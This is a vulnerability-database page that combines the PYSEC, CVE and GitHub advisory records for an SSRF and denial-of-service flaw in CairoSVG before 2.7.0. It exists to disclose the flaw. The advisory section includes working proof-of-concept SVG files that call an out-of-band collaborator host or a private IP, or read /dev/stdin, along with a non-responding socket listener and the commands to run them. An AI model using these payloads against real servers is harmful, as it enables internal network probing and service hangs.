PYSEC-2023-9
Vulnerability from pysec - Published: 2023-03-20 16:15 - Updated: 2023-05-04 03:49
VLAI?
Details
CairoSVG is an SVG converter based on Cairo, a 2D graphics library. Prior to version 2.7.0, Cairo can send requests to external hosts when processing SVG files. A malicious actor could send a specially crafted SVG file that allows them to perform a server-side request forgery or denial of service. Version 2.7.0 disables CairoSVG's ability to access other files online by default.
Impacted products
| Name | purl | cairosvg | pkg:pypi/cairosvg |
|---|
Aliases
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "cairosvg",
"purl": "pkg:pypi/cairosvg"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "12d31c653c0254fa9d9853f66b04ea46e7397255"
},
{
"fixed": "33007d4af9195e2bfb2ff9af064c4c2d8e4b2b53"
}
],
"repo": "https://github.com/Kozea/CairoSVG",
"type": "GIT"
},
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.7.0"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"0.1",
"0.1.1",
"0.1.2",
"0.2",
"0.3",
"0.3.1",
"0.4",
"0.4.1",
"0.4.2",
"0.4.3",
"0.4.4",
"0.5",
"1.0",
"1.0.1",
"1.0.10",
"1.0.11",
"1.0.12",
"1.0.13",
"1.0.14",
"1.0.15",
"1.0.16",
"1.0.17",
"1.0.18",
"1.0.19",
"1.0.2",
"1.0.20",
"1.0.21",
"1.0.22",
"1.0.3",
"1.0.4",
"1.0.5",
"1.0.6",
"1.0.7",
"1.0.8",
"1.0.9",
"2.0.0",
"2.0.0rc1",
"2.0.0rc2",
"2.0.0rc3",
"2.0.0rc4",
"2.0.0rc5",
"2.0.0rc6",
"2.0.1",
"2.0.2",
"2.0.3",
"2.1.0",
"2.1.1",
"2.1.2",
"2.1.3",
"2.2.0",
"2.2.1",
"2.3.0",
"2.3.1",
"2.4.0",
"2.4.1",
"2.4.2",
"2.5.0",
"2.5.1",
"2.5.2",
"2.6.0"
]
}
],
"aliases": [
"CVE-2023-27586",
"GHSA-rwmf-w63j-p7gv"
],
"details": "CairoSVG is an SVG converter based on Cairo, a 2D graphics library. Prior to version 2.7.0, Cairo can send requests to external hosts when processing SVG files. A malicious actor could send a specially crafted SVG file that allows them to perform a server-side request forgery or denial of service. Version 2.7.0 disables CairoSVG\u0027s ability to access other files online by default.",
"id": "PYSEC-2023-9",
"modified": "2023-05-04T03:49:44.989748Z",
"published": "2023-03-20T16:15:00Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Kozea/CairoSVG/releases/tag/2.7.0"
},
{
"type": "ADVISORY",
"url": "https://github.com/Kozea/CairoSVG/security/advisories/GHSA-rwmf-w63j-p7gv"
},
{
"type": "FIX",
"url": "https://github.com/Kozea/CairoSVG/commit/12d31c653c0254fa9d9853f66b04ea46e7397255"
},
{
"type": "FIX",
"url": "https://github.com/Kozea/CairoSVG/commit/33007d4af9195e2bfb2ff9af064c4c2d8e4b2b53"
}
]
}
CVE-2023-27586 (GCVE-0-2023-27586)
Vulnerability from cvelistv5 – Published: 2023-03-20 15:23 – Updated: 2025-02-25 14:52
VLAI?
Title
CairoSVG improperly processes SVG files loaded from external resources
Summary
CairoSVG is an SVG converter based on Cairo, a 2D graphics library. Prior to version 2.7.0, Cairo can send requests to external hosts when processing SVG files. A malicious actor could send a specially crafted SVG file that allows them to perform a server-side request forgery or denial of service. Version 2.7.0 disables CairoSVG's ability to access other files online by default.
Severity ?
9.9 (Critical)
Assigner
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T12:16:36.330Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/Kozea/CairoSVG/security/advisories/GHSA-rwmf-w63j-p7gv",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/Kozea/CairoSVG/security/advisories/GHSA-rwmf-w63j-p7gv"
},
{
"name": "https://github.com/Kozea/CairoSVG/commit/12d31c653c0254fa9d9853f66b04ea46e7397255",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/Kozea/CairoSVG/commit/12d31c653c0254fa9d9853f66b04ea46e7397255"
},
{
"name": "https://github.com/Kozea/CairoSVG/commit/33007d4af9195e2bfb2ff9af064c4c2d8e4b2b53",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/Kozea/CairoSVG/commit/33007d4af9195e2bfb2ff9af064c4c2d8e4b2b53"
},
{
"name": "https://github.com/Kozea/CairoSVG/releases/tag/2.7.0",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/Kozea/CairoSVG/releases/tag/2.7.0"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-27586",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-02-25T14:30:19.301622Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-02-25T14:52:14.700Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "CairoSVG",
"vendor": "Kozea",
"versions": [
{
"status": "affected",
"version": "\u003c 2.7.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "CairoSVG is an SVG converter based on Cairo, a 2D graphics library. Prior to version 2.7.0, Cairo can send requests to external hosts when processing SVG files. A malicious actor could send a specially crafted SVG file that allows them to perform a server-side request forgery or denial of service. Version 2.7.0 disables CairoSVG\u0027s ability to access other files online by default."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 9.9,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:L",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-20",
"description": "CWE-20: Improper Input Validation",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918: Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-03-20T15:23:31.106Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/Kozea/CairoSVG/security/advisories/GHSA-rwmf-w63j-p7gv",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/Kozea/CairoSVG/security/advisories/GHSA-rwmf-w63j-p7gv"
},
{
"name": "https://github.com/Kozea/CairoSVG/commit/12d31c653c0254fa9d9853f66b04ea46e7397255",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/Kozea/CairoSVG/commit/12d31c653c0254fa9d9853f66b04ea46e7397255"
},
{
"name": "https://github.com/Kozea/CairoSVG/commit/33007d4af9195e2bfb2ff9af064c4c2d8e4b2b53",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/Kozea/CairoSVG/commit/33007d4af9195e2bfb2ff9af064c4c2d8e4b2b53"
},
{
"name": "https://github.com/Kozea/CairoSVG/releases/tag/2.7.0",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/Kozea/CairoSVG/releases/tag/2.7.0"
}
],
"source": {
"advisory": "GHSA-rwmf-w63j-p7gv",
"discovery": "UNKNOWN"
},
"title": "CairoSVG improperly processes SVG files loaded from external resources"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-27586",
"datePublished": "2023-03-20T15:23:31.106Z",
"dateReserved": "2023-03-04T01:03:53.634Z",
"dateUpdated": "2025-02-25T14:52:14.700Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
GHSA-RWMF-W63J-P7GV
Vulnerability from github – Published: 2023-03-20 21:27 – Updated: 2024-11-18 16:26
VLAI?
Summary
CairoSVG improperly processes SVG files loaded from external resources
Details
SSRF vulnerability
Summary
When CairoSVG processes an SVG file, it can make requests to the inner host and different outside hosts.
Operating system, version and so on
Linux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9
Tested CairoSVG version
2.6.0
Details
A specially crafted SVG file that loads an external resource from a URL. Remote attackers could exploit this vulnerability to cause a scan of an organization's internal resources or a DDOS attack on external resources. It looks like this bug can affect websites and cause request forgery on the server.
PoC
- Generating malicious svg file: 1.1 CairoSVG_exploit.svg:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<image height="200" width="200" xlink:href="http://[jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com](http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com/)/3" />
<style type="text/css">@import url("http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com/5");</style>
<style type="text/css">
<![CDATA[
@import url("http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com:80/9");
rect { fill: red; stroke: blue; stroke-width: 3 }
]]>
</style>
</svg>
1.2 CairoSVG_exploit_2.svg:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<defs>
<pattern id="img1" patternUnits="userSpaceOnUse" width="600" height="450">
<image xlink:href="http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com:80/11" x="0" y="0" width="600" height="450" />
</pattern>
</defs>
<path d="M5,50 l0,100 l100,0 l0,-100 l-100,0 M215,100 a50,50 0 1 1 -100,0 50,50 0 1 1 100,0 M265,50 l50,100 l-100,0 l50,-100 z" fill="url(#img1)" />
</svg>
1.3 CairoSVG_exploit_3.svg:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<use href="http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com:80/13" />
</svg>
-
Run some commands:
$ python3 -m cairosvg CairoSVG_exploit.svg -f png$ python3 -m cairosvg CairoSVG_exploit_2.svg -f png$ python3 -m cairosvg CairoSVG_exploit_3.svg -f png -
See result requests in Burp Collaborator:
DOS vulnerability with SSTI
Summary
When CairoSVG processes an SVG file, it can send requests to external hosts and wait for a response from the external server after a successful TCP handshake. This will cause the server to hang. It seems this bug can affect websites or servers and cause a complete freeze while uploading this PoC file to the server.
Operating system, version and so on
Linux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9
Tested CairoSVG version
2.6.0
PoC
- Generating malicious svg file:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<use href="http://192.168.56.1:1234/" />
</svg>
- In other server run this python program:
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('0.0.0.0', 1234))
s.listen(1)
conn, addr = s.accept()
with conn:
while True:
data = conn.recv(2048)
s.close()
- Run commands:
$timeout 60 python3 -m cairosvg CairoSVG_exploit_dos.svg -f png(without timeout server will hang forever)
DOS vulnerability with stdin file descriptor
Summary
Specially crafted SVG file that opens /proc/self/fd/1 or /dev/stdin results in a hang with a tiny PoC file. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted SVG file. It seems this bug can affect websites or servers and cause a complete freeze while uploading this PoC file to the server.
Operating system, version and so on
Linux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9
Tested CairoSVG version
2.6.0
PoC
- Generating malicious svg file:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<use href="file:///dev/stdin" />
</svg>
- In other server run this python program:
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('0.0.0.0', 1234))
s.listen(1)
conn, addr = s.accept()
with conn:
while True:
data = conn.recv(2048)
s.close()
- Run commands:
$timeout 60 python3 -m cairosvg cariosvg_exploit_dos.svg -f png
Severity ?
9.9 (Critical)
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "CairoSVG"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.7.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-27586"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2023-03-20T21:27:15Z",
"nvd_published_at": "2023-03-20T16:15:00Z",
"severity": "HIGH"
},
"details": "# SSRF vulnerability\n\n## Summary\nWhen CairoSVG processes an SVG file, it can make requests to the inner host and different outside hosts.\n\n## Operating system, version and so on\nLinux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9\n\n## Tested CairoSVG version\n2.6.0\n\n## Details\nA specially crafted SVG file that loads an external resource from a URL. Remote attackers could exploit this vulnerability to cause a scan of an organization\u0027s internal resources or a DDOS attack on external resources.\nIt looks like this bug can affect websites and cause request forgery on the server.\n\n## PoC\n1. Generating malicious svg file:\n1.1 CairoSVG_exploit.svg:\n```svg\n\u003c?xml version=\"1.0\" standalone=\"yes\"?\u003e\n \u003c!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\"\u003e\n \u003csvg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"\u003e\n \u003cimage height=\"200\" width=\"200\" xlink:href=\"http://[jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com](http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com/)/3\" /\u003e\n \u003cstyle type=\"text/css\"\u003e@import url(\"http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com/5\");\u003c/style\u003e\n \u003cstyle type=\"text/css\"\u003e\n \u003c![CDATA[\n @import url(\"http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com:80/9\");\n rect { fill: red; stroke: blue; stroke-width: 3 }\n ]]\u003e\n \u003c/style\u003e\n\u003c/svg\u003e\n```\n\n1.2 CairoSVG_exploit_2.svg:\n```svg\n\u003c?xml version=\"1.0\" standalone=\"yes\"?\u003e\n \u003c!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\"\u003e\n \u003csvg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"\u003e\n \u003cdefs\u003e\n \u003cpattern id=\"img1\" patternUnits=\"userSpaceOnUse\" width=\"600\" height=\"450\"\u003e\n \u003cimage xlink:href=\"http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com:80/11\" x=\"0\" y=\"0\" width=\"600\" height=\"450\" /\u003e\n \u003c/pattern\u003e\n \u003c/defs\u003e\n \u003cpath d=\"M5,50 l0,100 l100,0 l0,-100 l-100,0 M215,100 a50,50 0 1 1 -100,0 50,50 0 1 1 100,0 M265,50 l50,100 l-100,0 l50,-100 z\" fill=\"url(#img1)\" /\u003e\n\u003c/svg\u003e\n```\n\n1.3 CairoSVG_exploit_3.svg:\n```svg\n\u003c?xml version=\"1.0\" standalone=\"yes\"?\u003e\n \u003c!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\"\u003e\n \u003csvg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"\u003e\n \u003cuse href=\"http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com:80/13\" /\u003e\n\u003c/svg\u003e\n```\n\n2. Run some commands:\n`$ python3 -m cairosvg CairoSVG_exploit.svg -f png`\n`$ python3 -m cairosvg CairoSVG_exploit_2.svg -f png`\n`$ python3 -m cairosvg CairoSVG_exploit_3.svg -f png `\n\n3. See result requests in Burp Collaborator:\n\n\n\n\n# DOS vulnerability with SSTI\n\n## Summary\nWhen CairoSVG processes an SVG file, it can send requests to external hosts and wait for a response from the external server after a successful TCP handshake. This will cause the server to hang.\nIt seems this bug can affect websites or servers and cause a complete freeze while uploading this PoC file to the server.\n\n## Operating system, version and so on\nLinux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9\n\n## Tested CairoSVG version\n2.6.0\n\n## PoC\n1. Generating malicious svg file:\n\n```svg\n\u003c?xml version=\"1.0\" standalone=\"yes\"?\u003e\n \u003c!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\"\u003e\n \u003csvg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"\u003e\n \u003cuse href=\"http://192.168.56.1:1234/\" /\u003e\n\u003c/svg\u003e\n```\n\n2. In other server run this python program:\n\n```python\nimport socket\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind((\u00270.0.0.0\u0027, 1234))\ns.listen(1)\nconn, addr = s.accept()\nwith conn:\n while True:\n data = conn.recv(2048)\ns.close()\n```\n\n3. Run commands:\n`$timeout 60 python3 -m cairosvg CairoSVG_exploit_dos.svg -f png`\n(without timeout server will hang forever)\n\n\n# DOS vulnerability with stdin file descriptor\n\n## Summary\n\nSpecially crafted SVG file that opens /proc/self/fd/1 or /dev/stdin results in a hang with a tiny PoC file. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted SVG file.\nIt seems this bug can affect websites or servers and cause a complete freeze while uploading this PoC file to the server.\n\n## Operating system, version and so on\nLinux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9\n\n## Tested CairoSVG version\n2.6.0\n\n## PoC\n1. Generating malicious svg file:\n\n```svg\n\u003c?xml version=\"1.0\" standalone=\"yes\"?\u003e\n \u003c!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\"\u003e\n \u003csvg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"\u003e\n \u003cuse href=\"file:///dev/stdin\" /\u003e\n\u003c/svg\u003e\n```\n\n2. In other server run this python program:\n```python\nimport socket\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind((\u00270.0.0.0\u0027, 1234))\ns.listen(1)\nconn, addr = s.accept()\nwith conn:\n while True:\n data = conn.recv(2048)\ns.close()\n```\n\n3. Run commands:\n`$timeout 60 python3 -m cairosvg cariosvg_exploit_dos.svg -f png`",
"id": "GHSA-rwmf-w63j-p7gv",
"modified": "2024-11-18T16:26:29Z",
"published": "2023-03-20T21:27:15Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Kozea/CairoSVG/security/advisories/GHSA-rwmf-w63j-p7gv"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-27586"
},
{
"type": "WEB",
"url": "https://github.com/Kozea/CairoSVG/commit/12d31c653c0254fa9d9853f66b04ea46e7397255"
},
{
"type": "WEB",
"url": "https://github.com/Kozea/CairoSVG/commit/33007d4af9195e2bfb2ff9af064c4c2d8e4b2b53"
},
{
"type": "PACKAGE",
"url": "https://github.com/Kozea/CairoSVG"
},
{
"type": "WEB",
"url": "https://github.com/Kozea/CairoSVG/releases/tag/2.7.0"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/cairosvg/PYSEC-2023-9.yaml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:L",
"type": "CVSS_V4"
}
],
"summary": "CairoSVG improperly processes SVG files loaded from external resources"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…